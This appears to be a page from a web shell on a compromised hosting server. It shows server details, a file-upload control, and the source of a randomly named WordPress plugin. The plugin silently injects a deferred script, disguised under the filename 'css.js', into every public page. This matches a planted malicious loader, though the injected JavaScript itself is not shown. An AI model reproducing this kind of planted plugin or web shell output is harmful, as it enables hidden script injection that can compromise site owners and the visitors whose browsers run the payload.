HEX
Server: Apache
System: Linux p3plzcpnl476737.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: p8pyefaexf70 (9161224)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/p8pyefaexf70/www/wp-content/plugins/script-b7296d2c-b7296d2c/script-b7296d2c-b7296d2c.php
<?php
/**
 * Plugin Name: Script B7296D2C
 * Description: Loads the embedded script on all frontend pages.
 * Version: 1.0.0
 */

if (!defined('ABSPATH')) { exit; }

function wp_b7296d2c_enqueue() {
    if (is_admin()) { return; }
    $handle = 'h_b7296d2c';
    $src = plugins_url('assets/css.js', __FILE__);
    wp_enqueue_script($handle, $src, [], null, true);
}
add_action('wp_enqueue_scripts', 'wp_b7296d2c_enqueue');

function wp_b7296d2c_defer_attr($tag, $handle, $src) {
    if ($handle !== 'h_b7296d2c') { return $tag; }
    if (strpos($tag, ' defer') !== false) { return $tag; }
    return str_replace(' src=', ' defer src=', $tag);
}
add_filter('script_loader_tag', 'wp_b7296d2c_defer_attr', 10, 3);